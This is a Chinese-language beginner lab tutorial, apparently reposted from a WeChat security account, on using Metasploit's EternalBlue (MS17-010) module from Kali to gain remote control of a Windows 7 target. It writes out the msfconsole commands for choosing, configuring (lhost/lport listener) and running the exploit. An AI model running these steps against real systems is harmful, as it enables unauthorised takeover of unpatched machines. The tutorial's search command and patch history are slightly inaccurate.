免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
——鼹鼠(一只正)
1.什么是“永恒之蓝”?
“永恒之蓝”是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。这种攻击方式最初由黑客团体Shadow Brokers(影子经纪人)在2017年4月14日晚公布,其中包含了“永恒之蓝”工具。不久之后,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒的攻击,波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
2.开始
准备工作:
1.kali linux 系统
2.Windows7系统
3.保证攻击机与靶机之间能够ping通
步骤总览:
1.找到永恒之蓝可以使用的模块
2.使用永恒之蓝的攻击模块
3.配置永恒之蓝的攻击模块设置
4.攻击tips:因为win10以上的系统均已打上了永恒之蓝补丁,所以行实验的时候使用win7作为靶机,读者在完成了对win7的权限获取之后,可以尝试同样的步骤对win10以上的系统进行攻击从而体会一下。
3.搜索永恒之蓝可用模块
输入命令:
sudo su
输入命令:
msfconsole
输入命令:
search ms_010
搜索结果:
4.使用攻击模块
输入命令:
use ms17_010_eternalblue 或者 use 0
5.配置攻击模块
展示攻击模块的配置项:
输入命令:
show options
配置项如下:
正式配置:
输入命令:
set lhost 192.168.10.151以及
set lport 9999
配置结果如下:
6.攻击
输入命令:
run如果读者没有运行成功,那么极有可能是端口被占用了
我在运行的时候没有运行成功,所以将监听端口从9999改为了10000
运行结果:
通过help命令可以查看获取权限之后所能够进行的操作:
7.总结
使用msf中的模块功能基本上都分为四大步:
1.找到需要使用的模块
2.使用模块
3.配置模块
4.运行模块
8.
原文始发于微信公众号(天盾信安):利用永恒之蓝获取靶机控制权限(新手篇)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论